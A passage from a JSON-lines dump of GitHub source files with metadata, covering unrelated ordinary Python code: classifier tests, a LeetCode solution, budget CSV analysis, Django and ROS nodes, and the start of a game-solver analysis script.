'w', encoding='utf8') as f:\n f.write(input_text)\n interim_res_pd, pure_sequence_set, sequence_set = main_func_txt_input(\n f_path, raw_output_template)\n\n # process results pd for output, 1. delete line breaker 2. delete last row\n interim_res_pd = process_lineBreaker(interim_res_pd)\n\n # CSV file Converting\n df_final_convertion(interim_res_pd, path_result)\n\n # Color converting\n color_assign_web_run(path_result)\n threshold_assigning_csv(path_result)\n res = json_run(sequence_set, path_result)\n return res\n\n\nif __name__ == '__main__':\n # 储存写出表格的地址\n path_result = ''\n # run(path_result, 'txt Input/H-NOX (true).txt')\n","repo_name":"JasonJiangs/HNOX_Pred","sub_path":"app/HNOX_Pred/Prediction.py","file_name":"Prediction.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32123266655","text":"import sys\r\nimport stdarray\r\nimport stddraw\r\nimport stdrandom\r\nimport stdio\r\nimport fileinput\r\n\r\n\r\n\r\nn = 1000\r\n#with open('in.txt','r', encoding='utf-8') as f:\r\n# read_data = f.read()\r\n# print(read_data)\r\n\r\nfor line in fileinput.input('in.txt'):\r\n\r\n probabilities = stdarray.readFloat1D()\r\n cx = stdarray.readFloat2D()\r\n cy = stdarray.readFloat2D()\r\n\r\n\r\n\r\n\r\n\r\nx = 0.0\r\ny = 0.0\r\nstddraw.setPenRadius(0.001)\r\nfor i in range(n):\r\n r = stdrandom.discrete(probabilities)\r\n x0 = cx[r][0] * x + cx[r][1] * y + cx[r][2]\r\n y0 = cy[r][0] * x + cy[r][1] * y + cy[r][2]\r\n x = x0\r\n y = y0\r\n stddraw.point(x, y)\r\n\r\nstddraw.show()\r\n","repo_name":"alexejkorovin/Educational","sub_path":"leaf.py","file_name":"leaf.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12422438263","text":"from __future__ import annotations\n\n\"\"\"Tests for Sklearn classifier.\"\"\"\n\nimport numpy as np\nfrom sklearn import svm\nfrom sklearn.gaussian_process import GaussianProcessClassifier\nfrom sklearn.gaussian_process.kernels import ConstantKernel\nfrom sklearn.gaussian_process.kernels import RBF\nfrom sklearn.metrics.pairwise import euclidean_distances\nfrom vizier._src.algorithms.classification import classifiers\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\n\nsvm_classifier = svm.SVC(kernel='rbf', C=1.)\ngpc_classifier = GaussianProcessClassifier(\n kernel=ConstantKernel(1.) * RBF(length_scale=1.))\n\n\n# TODO: convert it into a generic ClassifierTest for all subclasses.\nclass SklearnClassifierTest(parameterized.TestCase):\n \"\"\"Class for testing the classifier.\"\"\"\n\n def setUp(self):\n super().setUp()\n self.features_train = np.array([[1.], [2.], [3.], [4.]])\n self.labels_train = np.array([0, 0, 1, 1])\n self.labels_train_invalid = np.array([10., 10., 11., 11.])\n self.features_test = np.array([[-1.], [6.], [0.], [6.]])\n\n def test_raise_error_invalid_labels(self):\n classifier_instance = classifiers.SklearnClassifier(\n classifier=gpc_classifier,\n features=self.features_train,\n labels=self.labels_train_invalid,\n features_test=self.features_test,\n eval_metric='probability')\n with self.assertRaises(ValueError):\n classifier_instance._check_labels_values()\n\n @parameterized.parameters([\n dict(classifier=svm_classifier, eval_metric='decision'),\n dict(classifier=gpc_classifier, eval_metric='probability')\n ])\n def test_scores_shape(self, classifier, eval_metric):\n classifier_instance = classifiers.SklearnClassifier(\n classifier=classifier,\n features=self.features_train,\n labels=self.labels_train,\n features_test=self.features_test,\n eval_metric=eval_metric)\n scores = classifier_instance()\n self.assertEqual(scores.shape[0], self.features_test.shape[0])\n\n @parameterized.parameters([\n dict(classifier=svm_classifier, eval_metric='decision', threshold=0.),\n dict(classifier=gpc_classifier, eval_metric='probability', threshold=0.5)\n ])\n def test_labels_shape(self, classifier, eval_metric, threshold):\n classifier_instance = classifiers.SklearnClassifier(\n classifier=classifier,\n features=self.features_train,\n labels=self.labels_train,\n features_test=self.features_test,\n eval_metric=eval_metric)\n scores = classifier_instance()\n labels_test_pred = (scores >= threshold).astype(float)\n labels_test_real = np.array([0, 1, 0, 1])\n self.assertTrue((labels_test_pred == labels_test_real).all())\n\n @parameterized.parameters([dict(label_val=0.), dict(label_val=1.)])\n def test_raise_error_identical_labels(self, label_val):\n labels_train_identical = np.ones(\n (self.features_train.shape[0],)) * label_val\n classifier_instance = classifiers.SklearnClassifier(\n classifier=gpc_classifier,\n features=self.features_train,\n labels=labels_train_identical,\n features_test=self.features_test,\n eval_metric='probability')\n with self.assertRaises(ValueError):\n classifier_instance._check_labels_values()\n\n @parameterized.parameters([\n dict(classifier=svm_classifier, eval_metric='decision'),\n dict(classifier=gpc_classifier, eval_metric='probability')\n ])\n def test_scores_range(self, classifier, eval_metric):\n classifier_instance = classifiers.SklearnClassifier(\n classifier=classifier,\n features=self.features_train,\n labels=self.labels_train,\n features_test=self.features_test,\n eval_metric=eval_metric)\n scores = classifier_instance()\n if eval_metric == 'probability':\n self.assertGreaterEqual(scores.min(), 0.)\n self.assertLessEqual(scores.max(), 1.)\n else:\n max_distance = max(\n euclidean_distances(self.features_test).max(),\n euclidean_distances(self.features_train).max(),\n euclidean_distances(self.features_train, self.features_test).max())\n self.assertLessEqual(scores.max(), max_distance)\n\n @parameterized.parameters([\n dict(classifier=svm_classifier, eval_metric='decision', threshold=0.),\n dict(classifier=gpc_classifier, eval_metric='probability', threshold=0.5)\n ])\n def test_prediction_on_train_data(self, classifier, eval_metric, threshold):\n classifier_instance = classifiers.SklearnClassifier(\n classifier=classifier,\n features=self.features_train,\n labels=self.labels_train,\n features_test=self.features_train,\n eval_metric=eval_metric)\n scores = classifier_instance()\n labels_test_pred = (scores >= threshold).astype(float)\n self.assertTrue((labels_test_pred == self.labels_train).all())\n\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"google/vizier","sub_path":"vizier/_src/algorithms/classification/classifiers_test.py","file_name":"classifiers_test.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":1119,"dataset":"github-code","pt":"83"} +{"seq_id":"70739292752","text":"# 1608. Special Array With X Elements Greater Than or Equal X\n\nclass Solution:\n def specialArray(self, nums: List[int]) -> int:\n # sort array first\n sorted_nums = sorted(nums)\n\n for x in range(len(sorted_nums) + 1):\n # there should be x numbers >= x\n # using binary search to get the position where is start to be greater than x\n\n start = len(sorted_nums) - 1\n\n left, right = 0, len(sorted_nums) - 1\n while left <= right:\n mid = left + (right - left) // 2\n\n if sorted_nums[mid] < x:\n left = mid + 1\n else:\n right = mid - 1\n\n start = left\n\n # return answer if x numbers >= x\n if len(sorted_nums) - start == x:\n return x\n\n return -1\n","repo_name":"xxrjun/leetcode-python","sub_path":"solutions-python3/1608-SpecialArrayWithXElementsGreaterThanorEqualX.py","file_name":"1608-SpecialArrayWithXElementsGreaterThanorEqualX.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"8786540112","text":"import os\nimport csv\nbudget_csv = 'budget_data.csv'\n\n#The total number of months is equal to the number of rows - headerline\ntotal_months = sum(1 for line in open(budget_csv)) - 1\n\nchange = 0\ntotal_change = 0\nline = 0\nchanges =[]\n\ncsvfile = open(budget_csv)\ncsvreader = csv.reader(csvfile, delimiter=\",\")\nnext(csvreader) \nfor row in csvreader:\n total = int(row[1])\n previous_revenue = int(row[1])\n #print(previous_revenue)\n for row in csvreader:\n change = int(row[1]) - previous_revenue\n #print(previous_revenue)\n changes.append(change)\n previous_revenue = int(row[1])\n #print(change)\n total += int(row[1])\n\nmax_value = max(changes)\nmax_index = changes.index(max_value)\nmin_value = min(changes)\nmin_index = changes.index(min_value)\n#print(max_value, max_index, min_value, min_index)\n#print(changes)\ntotal_change = sum(changes) \n#print(total_change)\naverage_change = total_change/len(changes) \n#print(average_change)\nprint (\"Financial Analysis\")\nprint(\"----------------------\")\nprint (f'Total Months: {total_months}')\nprint(f'Total: ${total}') \nprint(f\"Average Change: ${average_change}\") \n\ncsvfile = open(budget_csv)\ncsvreader = csv.reader(csvfile, delimiter=\",\")\nnext(csvreader)\nfor row in csvreader:\n line += 1\n #index + 2 because we skipped 2 lines before\n if line == max_index + 2:\n increase = row[0]\n print(\"Greatest Increase in Profits: {}({})\".format(increase, max_value))\n if line == min_index + 2:\n decrease = row[0]\n print(\"Greatest Decrease in Profits: {}({})\".format(decrease, min_value)) \n\n\ndata_output = open(\"data.txt\", \"w\")\n\n# Write data to a .txt file\ndata_output.write(\"Financial Analysis\\n\")\ndata_output.write(\"----------------------\\n\")\ndata_output.write(f'Total Months: {total_months}\\n')\ndata_output.write(f'Total: ${total}\\n')\ndata_output.write(f\"Average Change: ${average_change}\\n\")\ndata_output.write(\"Greatest Increase in Profits: {}({})\\n\".format(increase, max_value))\ndata_output.write(\"Greatest Decrease in Profits: {}({})\".format(decrease, min_value))\n\n \n\n\n\n\n\n","repo_name":"lvdmit/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"31862678288","text":"from django.views.generic import FormView, RedirectView, TemplateView\nfrom django.views.decorators.debug import sensitive_post_parameters\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views.decorators.cache import never_cache\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth import logout, login\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.core.urlresolvers import reverse\nfrom django.contrib import messages\n\nfrom apps.project.services import ProjectService\nfrom apps.project.forms import ProjectForm, ProjectMembersForm\nfrom apps.gocd.services import GOCDService\n\n\nclass ProjectListView(TemplateView):\n template_name = \"project/project-list.html\"\n\n def get_context_data(self, *args, **kwargs):\n context = super(ProjectListView, self).get_context_data(*args, **kwargs)\n context['projects'] = ProjectService().get_all_projects()\n return context\n\n\nclass ProjectCreateView(FormView):\n template_name = \"project/create.html\"\n form_class = ProjectForm\n\n def form_valid(self, form, *args, **kwargs):\n messages.add_message(\n self.request, messages.SUCCESS, \"Created new project\")\n service = ProjectService()\n project = service.create_project(\n self.request.user,\n form.cleaned_data['name'],\n form.cleaned_data['description'],\n visible_to_all=form.cleaned_data['visible_to_all'])\n\n return HttpResponseRedirect(self.get_success_url())\n\n def get_success_url(self):\n return reverse('project:project-list')\n\n\nclass ProjectSettingsView(TemplateView):\n template_name = \"project/settings.html\"\n\n def get_context_data(self, *args, **kwargs):\n context = super(ProjectSettingsView, self).get_context_data(*args, **kwargs)\n project = ProjectService().get_project_by_pk(self.kwargs['pk'])\n context['project_form'] = ProjectForm(\n initial=self.get_project_initial(project))\n context['project_members_form'] = ProjectMembersForm(\n initial=self.get_project_members_initial())\n return context\n\n def get_project_initial(self, project):\n return {'name': project.name,\n 'description': project.description,\n 'visible_to_all': project.visible_to_all,\n 'gocd_server_host': project.gocd_server_host,\n 'gocd_server_port': project.gocd_server_port,\n 'gocd_server_username': project.gocd_server_username,\n 'gocd_server_password': project.gocd_server_password}\n\n def get_project_members_initial(self):\n return {}\n\n\nclass ProjectDetailView(TemplateView):\n template_name = \"project/detail.html\"\n\n def get_context_data(self, *args, **kwargs):\n context = super(ProjectDetailView, self).get_context_data(*args, **kwargs)\n project = ProjectService().get_project_by_pk(self.kwargs['pk'])\n context['project'] = project\n status, reason = GOCDService().test_connection(\n project.gocd_server_host, project.gocd_server_port,\n project.gocd_server_username, project.gocd_server_password)\n context['gocd_connection'] = status\n context['gocd_reason'] = reason\n pipeline_groups = GOCDService().get_pipeline_groups(\n project.gocd_server_host, project.gocd_server_port,\n project.gocd_server_username, project.gocd_server_password)\n context['pipeline_groups'] = ProjectService().get_groups_for_project(\n project, pipeline_groups)\n return context\n","repo_name":"scaryclam/gocd-interface","sub_path":"sites/gocd-interface/apps/project/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12619787494","text":"\nimport pandas as pd\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn import metrics\n\nfrom time import time\n\ndef load_data(file=\"questions.txt\"):\n df = pd.read_csv(file, sep=\",,,\", header=None,\n names=['question', 'label'],engine=\"python\")\n labelled_file = open('questions.txt')\n data = labelled_file.readlines()\n df['label']= df['label'].str.strip()\n\n split = StratifiedShuffleSplit(n_splits=1, test_size=0.3, random_state=42)\n for train_index, test_index in split.split(df['question'],df['label']):\n X_train,X_test = df['question'][train_index], df['question'][test_index]\n y_train, y_test = df['label'][train_index], df['label'][test_index]\n\n\n return X_train,y_train,X_test,y_test\n\n\ndef benchmark(clf,X_train_text,y_train,X_test_text,y_test,tf_idf=False):\n if tf_idf:\n vectorizer = TfidfVectorizer(sublinear_tf=True, max_df=0.5,\n stop_words='english')\n else:\n vectorizer = CountVectorizer(analyzer='word',lowercase=True)\n\n X_train = vectorizer.fit_transform(X_train_text)\n X_test= vectorizer.transform(X_test_text)\n print('_' * 80)\n print(\"Training: \")\n print(clf)\n t0 = time()\n clf.fit(X_train, y_train)\n train_time = time() - t0\n print(\"train time: %0.3fs\" % train_time)\n\n t0 = time()\n pred = clf.predict(X_test)\n test_time = time() - t0\n print(\"test time: %0.3fs\" % test_time)\n\n score = metrics.accuracy_score(y_test, pred)\n print(\"accuracy: %0.3f\" % score)\n\n\n print(\"classification report:\")\n print(metrics.classification_report(y_test, pred))\n\n\n #print(\"confusion matrix:\")\n #print(metrics.confusion_matrix(y_test, pred))\n\n print()\n clf_descr = str(clf).split('(')[0]\n return vectorizer,clf_descr, score, train_time, test_time\n\n\n","repo_name":"amitbcp/machine_learning_problems","sub_path":"scikit-learn/5_question-classification/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"83"} +{"seq_id":"37344489331","text":"import json\nfrom typing import List, Dict\n\ndef load_config(path='./data/config.json'):\n \"\"\"\n Load the config file from the path specified\n :param path:\n :return:\n \"\"\"\n with open(path, 'r') as f:\n res = json.load(f)\n return res\n\n\nrd = load_config()\n\n# Some general information\nBASE = rd['BASE']\nOAUTH_ID = rd['OAUTH_ID']\nAPI_KEY = rd['API_KEY']\nCOMMAND = rd['COMMAND']\nHOST = rd['HOST']\nPORT = rd['PORT']\n\n# Request header\nHEADER = {\"X-API-Key\": API_KEY}\nDEBUG = False\n\n# For API use\nCLASS_REF = {\n 0: \"泰坦\",\n 1: \"猎人\",\n 2: \"术士\"\n}\n\n# Environment\nENV = {\n 'cmd': []\n}\n\n\"\"\"\nPossible keys in the environment:\n- cmd: all possible commands, loaded by each module\n\"\"\"\n\nMsg_Comp = List[Dict]","repo_name":"KeithMaxwellZ/QQBot-Mirai","sub_path":"p_var.py","file_name":"p_var.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38468296172","text":"#!/usr/bin/env python\n\nimport rospy\nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom pdk_ros_msg.msg import pdk_RadarObjectList\nfrom tf.transformations import quaternion_from_euler\nimport math\n\npub_filtered = rospy.Publisher('filtered_data_topic', pdk_RadarObjectList, queue_size=10)\n\ndef radar_object_list_callback(data):\n # Create a new marker\n marker = Marker()\n marker.header = data.header\n marker.header.frame_id = \"base_footprint\"\n marker.ns = \"radar_objects\"\n marker.id = data.u_ObjId # Use a unique ID for the marker\n marker.type = Marker.ARROW\n marker.action = Marker.ADD\n marker.lifetime = rospy.Duration(0.7)\n\n\n # Set the marker position and orientation to represent the whole object list\n marker.pose.position.x = data.f_DistX # Use the first object's position\n marker.pose.position.y = data.f_DistY\n marker.pose.position.z = 0.0\n\n \n yaw = math.atan2(data.f_VabsY, data.f_VabsX)\n q = quaternion_from_euler(0, 0, yaw)\n \n\n marker.pose.orientation.x = q[0]\n marker.pose.orientation.y = q[1]\n marker.pose.orientation.z = q[2]\n marker.pose.orientation.w = q[3]\n\n # Calculate the overall size of the marker based on the object list\n marker.scale.x = 1.0\n marker.scale.y = 1.0\n marker.scale.z = 1.0\n\n # Set the marker color to represent the whole object list\n marker.color.r = 0.0 # Use the first object's color\n marker.color.g = 0.0\n marker.color.b = 1.0\n marker.color.a = 1.0\n\n # Publish the marker\n marker_array_msg.markers = [marker]\n #print(\"Unfiltered Object ID:\", data.u_ObjId)\n #print(\"Unfiltered Object Score:\", data.f_ObjectScore)\n #print(\"Unfiltered Object DistX:\", data.f_DistX)\n #print(\"Unfiltered Object DistY:\", data.f_DistY)\n marker_array_pub_unfiltered.publish(marker_array_msg)\n\ndef filtered_radar_object_list_callback(data):\n # Create a new marker\n marker = Marker()\n marker.header = data.header\n marker.header.frame_id = \"base_footprint\"\n marker.lifetime = rospy.Duration(0.7)\n if data.f_ObjectScore > 0.90 and -50 < data.f_DistX < 50 and -50 < data.f_DistY < 50:\n marker.ns = \"radar_objects\"\n marker.id = data.u_ObjId # Use a unique ID for the marker\n marker.action = Marker.ADD\n # Set the marker position and orientation to represent the whole object list\n \n marker.type = Marker.ARROW\n marker.color.r = 1.0 # Use the first object's color\n marker.color.g = 0.0\n marker.color.b = 0.0\n marker.color.a = 1.0\n marker.pose.position.x = data.f_DistX # Use the first object's position\n marker.pose.position.y = data.f_DistY\n marker.pose.position.z = 1\n marker.pose.orientation.w = 1.0\n marker.pose.orientation.x = 0.0\n marker.pose.orientation.y = 0.0\n marker.pose.orientation.z = 0.0\n\n # Calculate the overall size of the marker based on the object list\n marker.scale.x = 1.0\n marker.scale.y = 1.0\n marker.scale.z = 1.0\n\n\n # Publish the marker\n marker_array_msg.markers = [marker]\n #print(\"Filtered Object ID:\", data.u_ObjId)\n #print(\"Filtered Object Score:\", data.f_ObjectScore)\n #print(\"Filtered Object DistX:\", data.f_DistX)\n #print(\"Filtered Object DistY:\", data.f_DistY)\n marker_array_pub_filtered.publish(marker_array_msg)\n\n \n \n # Determine the object size based on bounding box distances\n ''' \n size_x = data.f_LDeltaX_left + data.f_LDeltaX_mid + data.f_LDeltaX_right\n size_y = data.f_LDeltaY_left + data.f_LDeltaY_mid + data.f_LDeltaY_right\n size_z = 2.0 # Set a default size in the z direction (vertical)\n\n # Determine the object type based on size\n \n if size_x < 0.5 and size_y < 2.0 : # Assuming size.x represents the width of the object and y represents the height \n marker.ns = \"Humans\"\n marker.type = Marker.ARROW\n marker.color.r = 1.0 # Use the first object's color\n marker.color.g = 0.0\n marker.color.b = 0.0\n marker.color.a = 1.0\n elif size_x < 5.0 and size_y < 2.0:\n marker.ns = \"cars\"\n marker.type = Marker.CYLINDER\n marker.color.r = 0.0 # Use the first object's color\n marker.color.g = 1.0\n marker.color.b = 0.0\n marker.color.a = 1.0\n else:\n marker.ns = \"others\"\n marker.type = Marker.SPHERE # Default shape for other objects\n marker.color.r = 0.0 # Use the first object's color\n marker.color.g = 0.0\n marker.color.b = 1.0\n marker.color.a = 1.0\n '''\n \n\ndef callback(data):\n if data.f_ObjectScore > 0.9 and -50 < data.f_DistX < 50 and -50 < data.f_DistY < 50:\n \n\t# Create a new message for the filtered data\n filtered_message = pdk_RadarObjectList ()\n filtered_message.header = data.header\n filtered_message.u_ObjId = data.u_ObjId\n filtered_message.f_DistX = data.f_DistX\n filtered_message.f_DistY = data.f_DistY\n filtered_message.f_VrelX = data.f_VrelX\n filtered_message.f_VrelY = data.f_VrelY\n filtered_message.f_ArelX = data.f_ArelX\n filtered_message.f_ArelY = data.f_ArelY\n filtered_message.f_DistXStd = data.f_DistXStd\n filtered_message.f_DistYStd = data.f_DistYStd\n filtered_message.f_VrelXStd = data.f_VrelXStd\n filtered_message.f_VrelYStd = data.f_VrelYStd\n filtered_message.f_ArelXStd = data.f_ArelXStd\n filtered_message.f_ArelYStd = data.f_ArelYStd\n filtered_message.f_LDeltaX_left = data.f_LDeltaX_left\n filtered_message.f_LDeltaX_mid = data.f_LDeltaX_mid\n filtered_message.f_LDeltaX_right = data.f_LDeltaX_right\n filtered_message.f_LDeltaY_left = data.f_LDeltaY_left\n filtered_message.f_LDeltaY_mid = data.f_LDeltaY_mid\n filtered_message.f_LDeltaY_right = data.f_LDeltaY_right\n filtered_message.f_RCS = data.f_RCS\n filtered_message.f_ObjectScore = data.f_ObjectScore\n filtered_message.u_LifeCycles = data.u_LifeCycles\n filtered_message.f_VabsX = data.f_VabsX\n filtered_message.f_VabsY = data.f_VabsY\n filtered_message.f_AabsX = data.f_AabsX\n filtered_message.f_AabsY = data.f_AabsY\n filtered_message.f_VabsXStd = data.f_VabsXStd\n filtered_message.f_VabsYStd = data.f_VabsYStd\n filtered_message.f_AabsXStd = data.f_AabsXStd\n filtered_message.f_AabsYStd = data.f_AabsYStd\n \n \n # Print the filtered data attributes\n #print(\"filtered_message.u_ObjId:\", data.u_ObjId)\n #print(\"filtered_message.f_ObjectScore:\", data.f_ObjectScore)\n #print(\"filtered_message.f_DistX:\", data.f_DistX)\n #print(\"filtered_message.f_DistY:\", data.f_DistY)\n \n # Publish the filtered data to the new topic\n pub_filtered.publish(filtered_message)\n \n\nif __name__ == '__main__':\n rospy.init_node('pdk_tracking_filter_and_visualization')\n # Create a marker array publisher\n marker_array_pub_unfiltered = rospy.Publisher('/pdk/tracking/visualization_marker_array', MarkerArray, queue_size=10)\n marker_array_pub_filtered = rospy.Publisher('/pdk/tracking/filtered_marker_array', MarkerArray, queue_size=10)\n marker_array_msg = MarkerArray()\n\n # Subscribe to the pdk_RadarObjectList topic\n rospy.Subscriber('/pdk/tracking', pdk_RadarObjectList, radar_object_list_callback)\n rospy.Subscriber('/pdk/tracking', pdk_RadarObjectList, filtered_radar_object_list_callback)\n rospy.Subscriber('/pdk/tracking', pdk_RadarObjectList, callback)\n # Spin and wait for messages\n rospy.spin()\n","repo_name":"Kaustubh3197/pdk_ros","sub_path":"pdk_ros_msgs/src/pdk_tracking_filter_and_visualization.py","file_name":"pdk_tracking_filter_and_visualization.py","file_ext":"py","file_size_in_byte":7612,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"13032385161","text":"import sys\nimport os\n\nfrom PostTelemac.meshlayer.post_telemac_pluginlayer import SelafinPluginLayer\nfrom PostTelemac.meshlayertools.meshlayer_compare_tool import CompareTool\n\n\n\ndef testCompareTool():\n \n print('begin')\n #path = os.path.normpath('C://00_Bureau//data2//SMEAG_REF_Q100.res')\n path1 = os.path.normpath('C://00_Bureau//00_QGIs//testcompare//SMEAG_R1_ARA_Q100_MAX.res')\n path2 = os.path.normpath('C://00_Bureau//00_QGIs//testcompare//SMEAG_REF_Q5_MAX.res')\n slf = SelafinPluginLayer()\n print('slf created')\n slf.load_selafin(path1,'TELEMAC')\n print('slf loaded')\n \n slf.propertiesdialog.debugtoprint = True\n \n comparetool = CompareTool(slf,slf.propertiesdialog)\n \n comparetool.initCompare(path2)\n comparetool.checkBox_6.setCheckState(2)\n \n comparetool.compare1(0)\n \n \n \n print('done')\n \n \ntestCompareTool()\n \n \n \n\n \n \n \n","repo_name":"Artelia/PostTelemac","sub_path":"tests/test_tool_compare.py","file_name":"test_tool_compare.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"83"} +{"seq_id":"27423524537","text":"import rclpy\n# import the ROS2 python dependencies\nfrom rclpy.node import Node\n# import the Twist module from geometry_msgs dependencies\nfrom geometry_msgs.msg import Twist\n# import the LaserScan module from sensor_msgs dependencies\nfrom sensor_msgs.msg import LaserScan\nfrom rclpy.qos import ReliabilityPolicy, QoSProfile\nfrom custom_interfaces.msg import Age\n\nclass Example36(Node):\n\n def __init__(self):\n # Here we have the class constructor\n # call the class constructor\n super().__init__('example36')\n # create the publisher object\n self.publisher_ = self.create_publisher(Twist, 'cmd_vel', 10)\n # create the subscriber object\n self.subscriber = self.create_subscription(LaserScan, '/scan', self.move_turtlebot, QoSProfile(depth=10, reliability=ReliabilityPolicy.BEST_EFFORT))\n # prevent unused variable warning\n self.subscriber\n # define the timer period for 0.5 seconds\n self.timer_period = 0.5\n # define the variable to save the received info\n self.laser_forward = 0\n # create a Twist message\n self.cmd = Twist()\n self.timer = self.create_timer(self.timer_period, self.motion)\n self.age = Age()\n\n def move_turtlebot(self,msg):\n # Save the frontal laser scan info at 0°\n self.laser_forward = msg.ranges[359] \n\n def motion(self):\n self.get_logger().info('I receive: \"%s\"' % str(self.laser_forward))\n # Read the first distance until fin a wall\n if self.laser_forward > 5:\n self.cmd.linear.x = 0.5\n self.cmd.angular.z = 0.5\n # Wall founded, it's time go go straight\n elif self.laser_forward <5 and self.laser_forward>=0.5:\n self.cmd.linear.x = 0.2\n self.cmd.angular.z = 0.0\n \n # be careful you have to stop. \n \n else:\n self.cmd.linear.x = 0.0\n self.cmd.angular.z = 0.0\n\n self.publisher_.publish(self.cmd)\n\n def on_shutdown(self):\n self.age.years = 2021.0\n self.age.months = 5.0\n self.age.days = 21.0\n self.get_logger().info('date this program was made : %s' % self.age.days + '/%s' % self.age.months +'/%s' % self.age.years)\n \ndef main(args=None):\n # initialize the ROS communication\n rclpy.init(args=args)\n # declare the node constructor\n example36 = Example36()\n \n # pause the program execution, waits for a request to kill the node (ctrl+c)\n rclpy.get_default_context().on_shutdown(example36.on_shutdown)\n try:\n rclpy.spin(example36)\n except KeyboardInterrupt:\n pass\n # Explicity destroy the node\n \n # shutdown the ROS communication\n rclpy.shutdown()\n\nif __name__ == '__main__':\n main()","repo_name":"Mondiegus/ROS2","sub_path":"basics/g3_services/ros2_ws/src/exercise36_pkg/exercise36_pkg/example36.py","file_name":"example36.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43572127162","text":"# Multi-Stage Re-Identification (MSRI) Game Solver (GS) v1.1\r\n# Component: MSRIGS Analysis on Usefulness and Fairness Using Simulated Datasets\r\n# Copyright 2018-2021 Zhiyu Wan, HIPLAB, Vanderilt University\r\n# Compatible with python 3.8.5. Package dependencies: Numpy 1.19.1, Scikit-learn 0.23.2, Pandas 1.1.3, Matplotlib 3.3.1,\r\n# Seaborn 0.11.0, and SciPy 1.5.2\r\n# Update history:\r\n# April 25, 2021: Add sharing rate function\r\n# May 11, 2021: Fix bugs about weighted_entropy for stat types 14, 15.2, and 15.3.\r\nimport numpy as np\r\nimport pandas as pd\r\nimport os.path\r\nimport msrigs_functions as sf\r\nfrom scipy.stats import entropy\r\nfrom scipy.stats import skew\r\nfrom scipy.special import rel_entr\r\nfrom scipy.stats import pearsonr\r\nfrom scipy.stats import spearmanr\r\nfrom scipy.stats import wasserstein_distance\r\nfrom self_implemented_distance import variational_distance, earth_movers_distance\r\n\r\n# configuration\r\nid_exp = '2058' # ID for the set of experiments\r\nn_S = 1000 # size of the sensitive dataset (<=90000) (default: 1000)\r\nstart_iter = 0 # start from a particular iteration (default: 0)\r\nn_iter = 100 # (default: 100)\r\nmethod = 2 # (default: 2)\r\nm_g = 12 # (<=16) (default: 12)\r\nweight = np.concatenate((np.ones(2) * 1, np.ones(m_g)), axis=None)\r\nmissing_level = 0.3 # (default: 0.3)\r\nover_confident = 0 # (default: 0)\r\nalter_weight = 0 # *0: Based on information entropy. 1: Uniform. 2: Special (the weight of 1st 2 geno features is 10x).\r\nalgorithm = 1 # *0: greedy algorithm. 1: brute-force algorithm.\r\npruning = 1 # (default: 1)\r\n\r\n# choose a type for statistics\r\nstat_type = 14 # 1:sharing rate, 2:number of distinct values, 3:entropy, 4:mean, 5:std, 6:skewness, 7:gini, 8:min, 9:Q1,\r\n# 10:median, 11:Q3, 12:max, 13:KL divergence, 13.2:variational distance, 13.3:Earth mover’s distance (EMD),\r\n# 14:pearson/spearman, 15:group-wise KL divergence, 15.2:group-wise variational distance, 15.3:group-wise Earth mover’s distance.\r\n# 15.5:group-wise payoff, 15.6:group-wise privacy, 15.7:group-wise utility, 15.8: sharing rate\r\n\r\n# choose a scenario\r\n#scenario = 5 # 0: no protection. 1: no genomic data sharing. 2: random opt-in. 3: random masking. 3.1: custom masking.\r\n# 4: opt-in game. 5: masking game. 6: no-attack masking game. 7: one-stage masking game.\r\n\r\n# setting for stat_type 15\r\n#explicit_usage = 0\r\n#targeted_attribute = 1 # 0:Birth year, 1:State\r\n\r\nsave_iter = [False, False, False, False, False, True, False, False] # save iteration for each scenario\r\ncolumn_names = ['defender_optimal', 'privacy', 'utility']\r\n\r\n# creat folders\r\nfolder_result = 'Results' + id_exp + '/Violin'\r\nif over_confident == 0 and alter_weight == 0 and algorithm == 0:\r\n folder_result += '/m'+str(method) + '/'\r\nelif over_confident == 1 and alter_weight == 0 and algorithm == 0:\r\n folder_result += '_over_confident/m' + str(method) + '/'\r\nelif alter_weight != 0 and over_confident == 0 and algorithm == 0:\r\n folder_result += '_multi_weight_distributions/Alter_weight_' + str(alter_weight) + '/m' + str(method) + '/'\r\nelif algorithm == 1 and over_confident == 0 and alter_weight == 0:\r\n folder_result += '_bf/'\r\nelse:\r\n print('The configuration is not correct.')\r\nif pruning == 1:\r\n folder_result += 'pruning/'\r\n# check the existence of the directory\r\nfolders = folder_result.rstrip('/').split('/')\r\nfolder = ''\r\nfor folder_name in folders:\r\n folder += folder_name + '/'\r\n if not os.path.exists(folder):\r\n os.mkdir(folder)\r\n\r\nif algorithm == 0:\r\n scenarios = [4, 